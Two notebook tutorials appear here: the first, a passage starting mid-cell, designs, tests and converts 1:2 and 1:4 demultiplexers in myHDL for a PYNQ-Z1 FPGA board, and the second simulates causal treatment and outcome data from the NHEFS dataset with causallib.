print(f'Module `DEMUX1_2_Combo` works as exspected: {Test}') ``` ## Verilog Conversion ``` DUT.convert() VerilogTextReader('DEMUX1_2_Combo'); ``` \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_2_Combo_RTL.png}} \caption{\label{fig:D12CRTL} DEMUX1_2_Combo RTL schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_2_Combo_SYN.png}} \caption{\label{fig:D12CSYN} DEMUX1_2_Combo Synthesized Schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_2_Combo_IMP.png}} \caption{\label{fig:D12CIMP} DEMUX1_2_Combo Implementated Schematic; Xilinx Vivado 2017.4} \end{figure} ## myHDL to Verilog Testbech ``` #create BitVectors xTVs=intbv(int(''.join(xTVs.astype(str)), 2))[TestLen:] sTVs=intbv(int(''.join(sTVs.astype(str)), 2))[TestLen:] xTVs, bin(xTVs), sTVs, bin(sTVs) @block def DEMUX1_2_Combo_TBV(): """ myHDL -> testbench for module `DEMUX1_2_Combo` """ x=Signal(bool(0)) s=Signal(bool(0)) y0=Signal(bool(0)) y1=Signal(bool(0)) @always_comb def print_data(): print(x, s, y0, y1) #Test Signal Bit Vectors xTV=Signal(xTVs) sTV=Signal(sTVs) DUT=DEMUX1_2_Combo(x, s, y0, y1) @instance def stimules(): for i in range(TestLen): x.next=int(xTV[i]) s.next=int(sTV[i]) yield delay(1) raise StopSimulation() return instances() TB=DEMUX1_2_Combo_TBV() TB.convert(hdl="Verilog", initial_values=True) VerilogTextReader('DEMUX1_2_Combo_TBV'); ``` ## PYNQ-Z1 Deployment ### Board Circuit \begin{figure} \centerline{\includegraphics[width=5cm]{DEMUX12PYNQZ1Circ.png}} \caption{\label{fig:D12Circ} 1:2 DEMUX PYNQ-Z1 (Non SoC) conceptualized circuit} \end{figure} ### Board Constraints ``` ConstraintXDCTextReader('DEMUX1_2'); ``` ### Video of Deployment DEMUX1_2_Combo on PYNQ-Z1 ([YouTube](https://www.youtube.com/watch?v=LJG4Z2kxEKE)) # 1 Channel Input:4 Channel Output demultiplexer in Gate Level Logic ## Sympy Expression ``` x, s0, s1, y0, y1, y2, y3=symbols('x, s0, s1, y0, y1, y2, y3') y14_0Eq=Eq(y0, ~s0&~s1&x) y14_1Eq=Eq(y1, s0&~s1&x) y14_2Eq=Eq(y2, ~s0&s1&x) y14_3Eq=Eq(y3, s0&s1&x) y14_0Eq, y14_1Eq, y14_2Eq, y14_3Eq T0=TruthTabelGenrator(y14_0Eq) T1=TruthTabelGenrator(y14_1Eq) T2=TruthTabelGenrator(y14_2Eq) T3=TruthTabelGenrator(y14_3Eq) T10=pd.merge(T1, T0, how='left') T20=pd.merge(T2, T10, how='left') T30=pd.merge(T3, T20, how='left') T30 y14_0EqN=lambdify([x, s0, s1], y14_0Eq.rhs, dummify=False) y14_1EqN=lambdify([x, s0, s1], y14_1Eq.rhs, dummify=False) y14_2EqN=lambdify([x, s0, s1], y14_2Eq.rhs, dummify=False) y14_3EqN=lambdify([x, s0, s1], y14_3Eq.rhs, dummify=False) SystmaticVals=np.array(list(itertools.product([0,1], repeat=3))) print(SystmaticVals) print(y14_0EqN(SystmaticVals[:, 2], SystmaticVals[:, 1], SystmaticVals[:, 0]).astype(int)) print(y14_1EqN(SystmaticVals[:, 2], SystmaticVals[:, 1], SystmaticVals[:, 0]).astype(int)) print(y14_2EqN(SystmaticVals[:, 2], SystmaticVals[:, 1], SystmaticVals[:, 0]).astype(int)) print(y14_3EqN(SystmaticVals[:, 2], SystmaticVals[:, 1], SystmaticVals[:, 0]).astype(int)) ``` ## myHDL Module ``` @block def DEMUX1_4_Combo(x, s0, s1, y0, y1, y2, y3): """ 1:4 DEMUX written in full combo Inputs: x(bool): input feed s0(bool): channel select 0 s1(bool): channel select 1 Outputs: y0(bool): ouput channel 0 y1(bool): ouput channel 1 y2(bool): ouput channel 2 y3(bool): ouput channel 3 """ @always_comb def logic(): y0.next= (not s0) and (not s1) and x y1.next= s0 and (not s1) and x y2.next= (not s0) and s1 and x y3.next= s0 and s1 and x return instances() ``` ## myHDL Testing ``` TestLen=10 SystmaticVals=list(itertools.product([0,1], repeat=3)) xTVs=np.array([i[2] for i in SystmaticVals]).astype(int) np.random.seed(15) xTVs=np.append(xTVs, np.random.randint(0,2, TestLen)).astype(int) s0TVs=np.array([i[1] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(16) s0TVs=np.append(s0TVs, np.random.randint(0,2, TestLen)).astype(int) s1TVs=np.array([i[0] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(17) s1TVs=np.append(s1TVs, np.random.randint(0,2, TestLen)).astype(int) TestLen=len(xTVs) SystmaticVals, xTVs, s0TVs, s1TVs Peeker.clear() x=Signal(bool(0)); Peeker(x, 'x') s0=Signal(bool(0)); Peeker(s0, 's0') s1=Signal(bool(0)); Peeker(s1, 's1') y0=Signal(bool(0)); Peeker(y0, 'y0') y1=Signal(bool(0)); Peeker(y1, 'y1') y2=Signal(bool(0)); Peeker(y2, 'y2') y3=Signal(bool(0)); Peeker(y3, 'y3') DUT=DEMUX1_4_Combo(x, s0, s1, y0, y1, y2, y3) def DEMUX1_4_Combo_TB(): """ myHDL only testbench for module `DEMUX1_4_Combo` """ @instance def stimules(): for i in range(TestLen): x.next=int(xTVs[i]) s0.next=int(s0TVs[i]) s1.next=int(s1TVs[i]) yield delay(1) raise StopSimulation() return instances() sim=Simulation(DUT, DEMUX1_4_Combo_TB(), *Peeker.instances()).run() Peeker.to_wavedrom('x', 's1', 's0', 'y0', 'y1', 'y2', 'y3') DEMUX1_4_ComboData=Peeker.to_dataframe() DEMUX1_4_ComboData=DEMUX1_4_ComboData[['x', 's1', 's0', 'y0', 'y1', 'y2', 'y3']] DEMUX1_4_ComboData DEMUX1_4_ComboData['y0Ref']=DEMUX1_4_ComboData.apply(lambda row:y14_0EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_ComboData['y1Ref']=DEMUX1_4_ComboData.apply(lambda row:y14_1EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_ComboData['y2Ref']=DEMUX1_4_ComboData.apply(lambda row:y14_2EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_ComboData['y3Ref']=DEMUX1_4_ComboData.apply(lambda row:y14_3EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_ComboData Test0=(DEMUX1_4_ComboData['y0']==DEMUX1_4_ComboData['y0Ref']).all() Test1=(DEMUX1_4_ComboData['y1']==DEMUX1_4_ComboData['y1Ref']).all() Test2=(DEMUX1_4_ComboData['y2']==DEMUX1_4_ComboData['y2Ref']).all() Test3=(DEMUX1_4_ComboData['y3']==DEMUX1_4_ComboData['y3Ref']).all() Test=Test0&Test1&Test2&Test3 print(f'Module `DEMUX1_4_Combo` works as exspected: {Test}') ``` ## Verilog Conversion ``` DUT.convert() VerilogTextReader('DEMUX1_4_Combo'); ``` \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_Combo_RTL.png}} \caption{\label{fig:D14CRTL} DEMUX1_4_Combo RTL schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_Combo_SYN.png}} \caption{\label{fig:D14CSYN} DEMUX1_4_Combo Synthesized Schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_Combo_IMP.png}} \caption{\label{fig:D14CIMP} DEMUX1_4_Combo Implementated Schematic; Xilinx Vivado 2017.4} \end{figure} ## myHDL to Verilog Testbench ``` #create BitVectors xTVs=intbv(int(''.join(xTVs.astype(str)), 2))[TestLen:] s0TVs=intbv(int(''.join(s0TVs.astype(str)), 2))[TestLen:] s1TVs=intbv(int(''.join(s1TVs.astype(str)), 2))[TestLen:] xTVs, bin(xTVs), s0TVs, bin(s0TVs), s1TVs, bin(s1TVs) @block def DEMUX1_4_Combo_TBV(): """ myHDL -> testbench for module `DEMUX1_4_Combo` """ x=Signal(bool(0)) s0=Signal(bool(0)) s1=Signal(bool(0)) y0=Signal(bool(0)) y1=Signal(bool(0)) y2=Signal(bool(0)) y3=Signal(bool(0)) @always_comb def print_data(): print(x, s0, s1, y0, y1, y2, y3) #Test Signal Bit Vectors xTV=Signal(xTVs) s0TV=Signal(s0TVs) s1TV=Signal(s1TVs) DUT=DEMUX1_4_Combo(x, s0, s1, y0, y1, y2, y3) @instance def stimules(): for i in range(TestLen): x.next=int(xTV[i]) s0.next=int(s0TV[i]) s1.next=int(s1TV[i]) yield delay(1) raise StopSimulation() return instances() TB=DEMUX1_4_Combo_TBV() TB.convert(hdl="Verilog", initial_values=True) VerilogTextReader('DEMUX1_4_Combo_TBV'); ``` ## PYNQ-Z1 Deployment ### Board Circuit \begin{figure} \centerline{\includegraphics[width=5cm]{DEMUX14PYNQZ1Circ.png}} \caption{\label{fig:D14Circ} 1:4 DEMUX PYNQ-Z1 (Non SoC) conceptualized circuit} \end{figure} ### Board Constraints ``` ConstraintXDCTextReader('DEMUX1_4'); ``` ### Video of Deployment DEMUX1_4_Combo on PYNQ-Z1 ([YouTube](https://www.youtube.com/watch?v=VT5Iyy8dMdg)) # 1 Channel Input:4 Channel Output demultiplexer via DEMUX Stacking ## myHDL Module ``` @block def DEMUX1_4_DMS(x, s0, s1, y0, y1, y2, y3): """ 1:4 DEMUX via DEMUX Stacking Inputs: x(bool): input feed s0(bool): channel select 0 s1(bool): channel select 1 Outputs: y0(bool): ouput channel 0 y1(bool): ouput channel 1 y2(bool): ouput channel 2 y3(bool): ouput channel 3 """ s0_y0y1_WIRE=Signal(bool(0)) s0_y2y3_WIRE=Signal(bool(0)) x_s1_DEMUX=DEMUX1_2_Combo(x, s1, s0_y0y1_WIRE, s0_y2y3_WIRE) s1_y0y1_DEMUX=DEMUX1_2_Combo(s0_y0y1_WIRE, s0, y0, y1) s1_y2y3_DEMUX=DEMUX1_2_Combo(s0_y2y3_WIRE, s0, y2, y3) return instances() ``` ## myHDL Testing ``` TestLen=10 SystmaticVals=list(itertools.product([0,1], repeat=3)) xTVs=np.array([i[2] for i in SystmaticVals]).astype(int) np.random.seed(15) xTVs=np.append(xTVs, np.random.randint(0,2, TestLen)).astype(int) s0TVs=np.array([i[1] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(16) s0TVs=np.append(s0TVs, np.random.randint(0,2, TestLen)).astype(int) s1TVs=np.array([i[0] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(17) s1TVs=np.append(s1TVs, np.random.randint(0,2, TestLen)).astype(int) TestLen=len(xTVs) SystmaticVals, xTVs, s0TVs, s1TVs Peeker.clear() x=Signal(bool(0)); Peeker(x, 'x') s0=Signal(bool(0)); Peeker(s0, 's0') s1=Signal(bool(0)); Peeker(s1, 's1') y0=Signal(bool(0)); Peeker(y0, 'y0') y1=Signal(bool(0)); Peeker(y1, 'y1') y2=Signal(bool(0)); Peeker(y2, 'y2') y3=Signal(bool(0)); Peeker(y3, 'y3') DUT=DEMUX1_4_DMS(x, s0, s1, y0, y1, y2, y3) def DEMUX1_4_DMS_TB(): """ myHDL only testbench for module `DEMUX1_4_DMS` """ @instance def stimules(): for i in range(TestLen): x.next=int(xTVs[i]) s0.next=int(s0TVs[i]) s1.next=int(s1TVs[i]) yield delay(1) raise StopSimulation() return instances() sim=Simulation(DUT, DEMUX1_4_DMS_TB(), *Peeker.instances()).run() Peeker.to_wavedrom('x', 's1', 's0', 'y0', 'y1', 'y2', 'y3') DEMUX1_4_DMSData=Peeker.to_dataframe() DEMUX1_4_DMSData=DEMUX1_4_DMSData[['x', 's1', 's0', 'y0', 'y1', 'y2', 'y3']] DEMUX1_4_DMSData Test=DEMUX1_4_DMSData==DEMUX1_4_ComboData[['x', 's1', 's0', 'y0', 'y1', 'y2', 'y3']] Test=Test.all().all() print(f'DEMUX1_4_DMS equivlinet to DEMUX1_4_Combo: {Test}') ``` ## Verilog Conversion ``` DUT.convert() VerilogTextReader('DEMUX1_4_DMS'); ``` \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_DMS_RTL.png}} \caption{\label{fig:D14DMSRTL} DEMUX1_4_DMS RTL schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_DMS_SYN.png}} \caption{\label{fig:D14DMSSYN} DEMUX1_4_DMS Synthesized Schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_DMS_IMP.png}} \caption{\label{fig:D14DMSIMP} DEMUX1_4_DMS Implementated Schematic; Xilinx Vivado 2017.4} \end{figure} ## myHDL to Verilog Testbench ``` #create BitVectors xTVs=intbv(int(''.join(xTVs.astype(str)), 2))[TestLen:] s0TVs=intbv(int(''.join(s0TVs.astype(str)), 2))[TestLen:] s1TVs=intbv(int(''.join(s1TVs.astype(str)), 2))[TestLen:] xTVs, bin(xTVs), s0TVs, bin(s0TVs), s1TVs, bin(s1TVs) @block def DEMUX1_4_DMS_TBV(): """ myHDL -> testbench for module `DEMUX1_4_DMS` """ x=Signal(bool(0)) s0=Signal(bool(0)) s1=Signal(bool(0)) y0=Signal(bool(0)) y1=Signal(bool(0)) y2=Signal(bool(0)) y3=Signal(bool(0)) @always_comb def print_data(): print(x, s0, s1, y0, y1, y2, y3) #Test Signal Bit Vectors xTV=Signal(xTVs) s0TV=Signal(s0TVs) s1TV=Signal(s1TVs) DUT=DEMUX1_4_DMS(x, s0, s1, y0, y1, y2, y3) @instance def stimules(): for i in range(TestLen): x.next=int(xTV[i]) s0.next=int(s0TV[i]) s1.next=int(s1TV[i]) yield delay(1) raise StopSimulation() return instances() TB=DEMUX1_4_DMS_TBV() TB.convert(hdl="Verilog", initial_values=True) VerilogTextReader('DEMUX1_4_DMS_TBV'); ``` ## PYNQ-Z1 Deployment ### Board Circuit See Board Circuit for "1 Channel Input:4 Channel Output demultiplexer in Gate Level Logic" ### Board Constraint uses same 'DEMUX1_4.xdc' as "# 1 Channel Input:4 Channel Output demultiplexer in Gate Level Logic" ### Video of Deployment DEMUX1_4_DMS on PYNQ-Z1 ([YouTube](https://www.youtube.com/watch?v=8A9iDf4nh74)) # 1:2 DEMUX via Behavioral IF ## myHDL Module ``` @block def DEMUX1_2_B(x, s, y0, y1): """ 1:2 DMUX in behavioral Inputs: x(bool): input feed s(bool): channel select Outputs: y0(bool): ouput channel 0 y1(bool): ouput channel 1 """ @always_comb def logic(): if s==0: #take note that since we have #two ouputs there next state values #must both be set, else the last #value will presist till it changes y0.next=x y1.next=0 else: y0.next=0 y1.next=x return instances() ``` ## myHDL Testing ``` TestLen=10 SystmaticVals=list(itertools.product([0,1], repeat=2)) xTVs=np.array([i[1] for i in SystmaticVals]).astype(int) np.random.seed(15) xTVs=np.append(xTVs, np.random.randint(0,2, TestLen)).astype(int) sTVs=np.array([i[0] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(16) sTVs=np.append(sTVs, np.random.randint(0,2, TestLen)).astype(int) TestLen=len(xTVs) SystmaticVals, sTVs, xTVs Peeker.clear() x=Signal(bool(0)); Peeker(x, 'x') s=Signal(bool(0)); Peeker(s, 's') y0=Signal(bool(0)); Peeker(y0, 'y0') y1=Signal(bool(0)); Peeker(y1, 'y1') DUT=DEMUX1_2_B(x, s, y0, y1) def DEMUX1_2_B_TB(): """ myHDL only testbench for module `DEMUX1_2_B` """ @instance def stimules(): for i in range(TestLen): x.next=int(xTVs[i]) s.next=int(sTVs[i]) yield delay(1) raise StopSimulation() return instances() sim=Simulation(DUT, DEMUX1_2_B_TB(), *Peeker.instances()).run() Peeker.to_wavedrom('x', 's', 'y0','y1') DEMUX1_2_BData=Peeker.to_dataframe() DEMUX1_2_BData=DEMUX1_2_BData[['x', 's', 'y0','y1']] DEMUX1_2_BData Test=DEMUX1_2_BData==DEMUX1_2_ComboData[['x', 's', 'y0','y1']] Test=Test.all().all() print(f'DEMUX1_2_BD is equivlent to DEMUX1_2_Combo: {Test}') ``` ## Verilog Conversion ``` DUT.convert() VerilogTextReader('DEMUX1_2_B'); ``` \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_2_B_RTL.png}} \caption{\label{fig:D12BRTL} DEMUX1_2_B RTL schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_2_B_SYN.png}} \caption{\label{fig:D12BSYN} DEMUX1_2_B Synthesized Schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_2_B_IMP.png}} \caption{\label{fig:D12BIMP} DEMUX1_2_B Implementated Schematic; Xilinx Vivado 2017.4} \end{figure} ## myHDL to Verilog Testbench ``` #create BitVectors xTVs=intbv(int(''.join(xTVs.astype(str)), 2))[TestLen:] sTVs=intbv(int(''.join(sTVs.astype(str)), 2))[TestLen:] xTVs, bin(xTVs), sTVs, bin(sTVs) @block def DEMUX1_2_B_TBV(): """ myHDL -> testbench for module `DEMUX1_2_B` """ x=Signal(bool(0)) s=Signal(bool(0)) y0=Signal(bool(0)) y1=Signal(bool(0)) @always_comb def print_data(): print(x, s, y0, y1) #Test Signal Bit Vectors xTV=Signal(xTVs) sTV=Signal(sTVs) DUT=DEMUX1_2_B(x, s, y0, y1) @instance def stimules(): for i in range(TestLen): x.next=int(xTV[i]) s.next=int(sTV[i]) yield delay(1) raise StopSimulation() return instances() TB=DEMUX1_2_B_TBV() TB.convert(hdl="Verilog", initial_values=True) VerilogTextReader('DEMUX1_2_B_TBV'); ``` ## PYNQ-Z1 Deployment ### Board Circuit See Board Circuit for "1 Channel Input: 2 Channel Output demultiplexer in Gate Level Logic" ### Board Constraint uses same 'DEMUX1_2.xdc' as "1 Channel Input: 2 Channel Output demultiplexer in Gate Level Logic" ### Video of Deployment DEMUX1_2_B on PYNQ-Z1 ([YouTube](https://www.youtube.com/watch?v=Ux0olpi2ppI)) # 1:4 DEMUX via Behavioral if-elif-else ## myHDL Module ``` @block def DEMUX1_4_B(x, s0, s1, y0, y1, y2, y3): """ 1:4 DEMUX written via behaviorial Inputs: x(bool): input feed s0(bool): channel select 0 s1(bool): channel select 1 Outputs: y0(bool): ouput channel 0 y1(bool): ouput channel 1 y2(bool): ouput channel 2 y3(bool): ouput channel 3 """ @always_comb def logic(): if s0==0 and s1==0: y0.next=x; y1.next=0 y2.next=0; y3.next=0 elif s0==1 and s1==0: y0.next=0; y1.next=x y2.next=0; y3.next=0 elif s0==0 and s1==1: y0.next=0; y1.next=0 y2.next=x; y3.next=0 else: y0.next=0; y1.next=0 y2.next=0; y3.next=x return instances() ``` ## myHDL Testing ``` TestLen=10 SystmaticVals=list(itertools.product([0,1], repeat=3)) xTVs=np.array([i[2] for i in SystmaticVals]).astype(int) np.random.seed(15) xTVs=np.append(xTVs, np.random.randint(0,2, TestLen)).astype(int) s0TVs=np.array([i[1] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(16) s0TVs=np.append(s0TVs, np.random.randint(0,2, TestLen)).astype(int) s1TVs=np.array([i[0] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(17) s1TVs=np.append(s1TVs, np.random.randint(0,2, TestLen)).astype(int) TestLen=len(xTVs) SystmaticVals, xTVs, s0TVs, s1TVs Peeker.clear() x=Signal(bool(0)); Peeker(x, 'x') s0=Signal(bool(0)); Peeker(s0, 's0') s1=Signal(bool(0)); Peeker(s1, 's1') y0=Signal(bool(0)); Peeker(y0, 'y0') y1=Signal(bool(0)); Peeker(y1, 'y1') y2=Signal(bool(0)); Peeker(y2, 'y2') y3=Signal(bool(0)); Peeker(y3, 'y3') DUT=DEMUX1_4_B(x, s0, s1, y0, y1, y2, y3) def DEMUX1_4_B_TB(): """ myHDL only testbench for module `DEMUX1_4_Combo` """ @instance def stimules(): for i in range(TestLen): x.next=int(xTVs[i]) s0.next=int(s0TVs[i]) s1.next=int(s1TVs[i]) yield delay(1) raise StopSimulation() return instances() sim=Simulation(DUT, DEMUX1_4_B_TB(), *Peeker.instances()).run() Peeker.to_wavedrom('x', 's1', 's0', 'y0', 'y1', 'y2', 'y3') DEMUX1_4_BData=Peeker.to_dataframe() DEMUX1_4_BData=DEMUX1_4_BData[['x', 's1', 's0', 'y0', 'y1', 'y2', 'y3']] DEMUX1_4_BData Test=DEMUX1_4_BData==DEMUX1_4_ComboData[['x', 's1', 's0', 'y0', 'y1', 'y2', 'y3']] Test=Test.all().all() print(f'DEMUX1_4_B equivlinet to DEMUX1_4_Combo: {Test}') ``` ## Verilog Conversion ``` DUT.convert() VerilogTextReader('DEMUX1_4_B'); ``` \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_B_RTL.png}} \caption{\label{fig:D14BRTL} DEMUX1_4_B RTL schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_B_SYN.png}} \caption{\label{fig:D14BSYN} DEMUX1_4_B Synthesized Schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_B_IMP.png}} \caption{\label{fig:D14BIMP} DEMUX1_4_B Implementated Schematic; Xilinx Vivado 2017.4} \end{figure} ## myHDL to Verilog Testbench ``` #create BitVectors xTVs=intbv(int(''.join(xTVs.astype(str)), 2))[TestLen:] s0TVs=intbv(int(''.join(s0TVs.astype(str)), 2))[TestLen:] s1TVs=intbv(int(''.join(s1TVs.astype(str)), 2))[TestLen:] xTVs, bin(xTVs), s0TVs, bin(s0TVs), s1TVs, bin(s1TVs) @block def DEMUX1_4_B_TBV(): """ myHDL -> testbench for module `DEMUX1_4_B` """ x=Signal(bool(0)) s0=Signal(bool(0)) s1=Signal(bool(0)) y0=Signal(bool(0)) y1=Signal(bool(0)) y2=Signal(bool(0)) y3=Signal(bool(0)) @always_comb def print_data(): print(x, s0, s1, y0, y1, y2, y3) #Test Signal Bit Vectors xTV=Signal(xTVs) s0TV=Signal(s0TVs) s1TV=Signal(s1TVs) DUT=DEMUX1_4_B(x, s0, s1, y0, y1, y2, y3) @instance def stimules(): for i in range(TestLen): x.next=int(xTV[i]) s0.next=int(s0TV[i]) s1.next=int(s1TV[i]) yield delay(1) raise StopSimulation() return instances() TB=DEMUX1_4_B_TBV() TB.convert(hdl="Verilog", initial_values=True) VerilogTextReader('DEMUX1_4_B_TBV'); ``` ## PYNQ-Z1 Deployment ### Board Circuit See Board Circuit for "1 Channel Input:4 Channel Output demultiplexer in Gate Level Logic" ### Board Constraint uses same 'DEMUX1_4.xdc' as "# 1 Channel Input:4 Channel Output demultiplexer in Gate Level Logic" ### Video of Deployment DEMUX1_4_B on PYNQ-Z1 ([YouTube](https://www.youtube.com/watch?v=MezWijKoDuk)) # Demultiplexer 1:4 Behavioral via Bitvectors ## myHDL Module ``` @block def DEMUX1_4_BV(x, S, Y): """ 1:4 DEMUX written via behaviorial with bit vectors Inputs: x(bool): input feed S(2bit vector): channel select bitvector; min=0, max=3 Outputs: Y(4bit vector): ouput channel bitvector; values min=0, max=15; allowed is: 0,1,2,4,8 in this application """ @always_comb def logic(): #here concat is used to build up the word #from the x input if S==0: Y.next=concat(intbv(0)[3:], x); '0001' elif S==1: Y.next=concat(intbv(0)[2:], x, intbv(0)[1:]); '0010' elif S==2: Y.next=concat(intbv(0)[1:], x, intbv(0)[2:]); '0100' else: Y.next=concat(x, intbv(0)[3:]); '1000' return instances() ``` ## myHDL Testing ``` xTVs=np.array([0,1]) xTVs=np.append(xTVs, np.random.randint(0,2,6)).astype(int) TestLen=len(xTVs) np.random.seed(12) STVs=np.arange(0,4) STVs=np.append(STVs, np.random.randint(0,4, 5)) TestLen, xTVs, STVs Peeker.clear() x=Signal(bool(0)); Peeker(x, 'x') S=Signal(intbv(0)[2:]); Peeker(S, 'S') Y=Signal(intbv(0)[4:]); Peeker(Y, 'Y') DUT=DEMUX1_4_BV(x, S, Y) def DEMUX1_4_BV_TB(): @instance def stimules(): for i in STVs: for j in xTVs: S.next=int(i) x.next=int(j) yield delay(1) raise StopSimulation() return instances() sim=Simulation(DUT, DEMUX1_4_BV_TB(), *Peeker.instances()).run() Peeker.to_wavedrom('x', 'S', 'Y', start_time=0, stop_time=2*TestLen+2) DEMUX1_4_BVData=Peeker.to_dataframe() DEMUX1_4_BVData=DEMUX1_4_BVData[['x', 'S', 'Y']] DEMUX1_4_BVData DEMUX1_4_BVData['y0']=None; DEMUX1_4_BVData['y1']=None; DEMUX1_4_BVData['y2']=None; DEMUX1_4_BVData['y3']=None DEMUX1_4_BVData[['y3', 'y2', 'y1', 'y0']]=DEMUX1_4_BVData[['Y']].apply(lambda bv: [int(i) for i in bin(bv, 4)], axis=1, result_type='expand') DEMUX1_4_BVData['s0']=None; DEMUX1_4_BVData['s1']=None DEMUX1_4_BVData[['s1', 's0']]=DEMUX1_4_BVData[['S']].apply(lambda bv: [int(i) for i in bin(bv, 2)], axis=1, result_type='expand') DEMUX1_4_BVData=DEMUX1_4_BVData[['x', 'S', 's0', 's1', 'Y', 'y3', 'y2', 'y1', 'y0']] DEMUX1_4_BVData DEMUX1_4_BVData['y0Ref']=DEMUX1_4_BVData.apply(lambda row:y14_0EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_BVData['y1Ref']=DEMUX1_4_BVData.apply(lambda row:y14_1EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_BVData['y2Ref']=DEMUX1_4_BVData.apply(lambda row:y14_2EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_BVData['y3Ref']=DEMUX1_4_BVData.apply(lambda row:y14_3EqN(row['x'], row['s0'], row['s1']), axis=1).astype(int) DEMUX1_4_BVData Test=DEMUX1_4_BVData[['y0', 'y1', 'y2', 'y3']].sort_index(inplace=True)==DEMUX1_4_BVData[['y0Ref', 'y1Ref', 'y2Ref', 'y3Ref']].sort_index(inplace=True) print(f'Module `DEMUX1_4_BVData` works as exspected: {Test}') ``` ## Verilog Conversion ``` DUT.convert() VerilogTextReader('DEMUX1_4_BV'); ``` \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_BV_RTL.png}} \caption{\label{fig:D14BVRTL} DEMUX1_4_BV RTL schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_BV_SYN.png}} \caption{\label{fig:D14BVSYN} DEMUX1_4_BV Synthesized Schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_4_BV_IMP.png}} \caption{\label{fig:D14BVIMP} DEMUX1_4_BV Implementated Schematic; Xilinx Vivado 2017.4} \end{figure} ## myHDL to Verilog Testbench (To Do!) ## PYNQ-Z1 Board Deployment ### Board Circuit ### Board Constraints ``` ConstraintXDCTextReader('DEMUX1_4_BV'); ``` ### Video of Deployment DEMUX1_4_BV on PYNQ-Z1 ([YouTube](https://www.youtube.com/watch?v=mVyTlkbJpKg))
github_jupyter
## Running a simulator using existing data Consider the case when input data already exists, and that data already has a causal structure. We would like to simulate treatment assignment and outcomes based on this data. ### Initialize the data First we load the desired data into a pandas DataFrame: ``` import pandas as pd from causallib.datasets import load_nhefs from causallib.simulation import CausalSimulator from causallib.simulation import generate_random_topology data = load_nhefs() X_given = data.X ``` say we want to create three more variables: covariate, treatment and outcome. This will be a bit difficult to hardwire a graph with many variables, so lets use the random topology generator: ``` topology, var_types = generate_random_topology(n_covariates=1, p=0.4, n_treatments=1, n_outcomes=1, given_vars=X_given.columns) ``` Now we create the simulator based on the variables topology: ``` outcome_types = "categorical" link_types = ['linear'] * len(var_types) prob_categories = pd.Series(data=[[0.5, 0.5] if typ in ["treatment", "outcome"] else None for typ in var_types], index=var_types.index) treatment_methods = "gaussian" snr = 0.9 treatment_importance = 0.8 effect_sizes = None sim = CausalSimulator(topology=topology.values, prob_categories=prob_categories, link_types=link_types, snr=snr, var_types=var_types, treatment_importances=treatment_importance, outcome_types=outcome_types, treatment_methods=treatment_methods, effect_sizes=effect_sizes) ``` Now in order to generate data based on the given data we need to specify: ``` X, prop, y = sim.generate_data(X_given=X_given) ``` ### Format the data for training and save it Now that we generated some data, we can format it so it would be easier to train and validate: ``` observed_set, validation_set = sim.format_for_training(X, prop, y) ``` observed_set is the observed dataset (excluding hidden variables)validation_set is for validation purposes - it has the counterfactuals, the treatments assignment and the propensity for every sample. You can save the datasets into csv: ``` covariates = observed_set.loc[:, observed_set.columns.str.startswith("x_")] print(covariates.shape) covariates.head() treatment_outcome = observed_set.loc[:, (observed_set.columns.str.startswith("t_") | observed_set.columns.str.startswith("y_"))] print(treatment_outcome.shape) treatment_outcome.head() print(validation_set.shape) validation_set.head() ```
github_jupyter
